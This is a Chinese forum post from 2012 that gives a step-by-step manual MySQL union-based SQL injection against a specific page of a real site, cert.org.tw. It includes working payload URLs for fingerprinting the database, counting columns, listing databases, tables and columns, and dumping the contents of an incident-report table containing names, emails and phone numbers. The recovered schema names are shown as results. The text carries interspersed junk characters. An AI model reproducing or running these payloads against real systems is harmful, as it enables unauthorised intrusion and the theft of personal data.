1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询9 D4 B. t, q8 M& S
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
4 H) Q1 w! X& I( q# v# whttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--, @& z- @6 p7 D9 g( t1 s
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--: H( B! ^! D& R% b
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。/ L4 ^. v1 }' {, R; S: M6 Y9 A
4.判断有没有写权限
, q: N$ r; _7 Dhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
# A$ ]. v1 O' ~, P( X没办法,手动猜表啦
1 V+ ?$ u" v: m0 q2 V. W5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,18 w j9 ^( N; [) C3 o6 e9 k, E/ u
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
6 q8 S& m* ^- G! s8 N. Y8 M7 E4 ~http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
& \0 m% i. n" |/ D& M+ R) y% b成功查出所有数据库,国外的黑客就是不一般。数据库如下:/ F3 D7 {0 X8 t$ I% s1 T
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
' N! X2 w' n' ~3 ^+ d3 D6.爆表,爆的是twcert库
: g( L% H( s" thttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--) Q) s$ w4 _) k& Z3 ~2 F- u
爆出如下表
4 i5 \# Q' M2 p- |+ m( Mdownloadfile,irsys,newsdata,secrpt,secrpt_big5- ^. t$ N% K. }; M5 `2 A
7.爆列名,这次爆的是irsys表
6 {0 g% F0 z" D; J1 K" whttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--( c! Q) N3 `6 O. Q
爆出如下列
: L+ s4 q6 d2 T$ F0 a( e. fir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
( o& [) Q2 X- j3 r& r8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
( [9 w0 R8 D7 u9 M* chttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--3 z5 ]! i3 r9 ?4 b0 u' c4 r
返回是3,说明每个列里有3个地段
! g" ~) h" Z! q" [: T9.爆字段内容5 V( N- P- e9 s( \
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--, u$ ]7 w" Y& q8 ~. s; X8 G5 F+ I }
爆出name列的第一个字段的内容
- P6 b' T: `: g) r9 h4 B8 ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
6 w2 e) p& t# |. u. |1 P% K) @3 } a爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对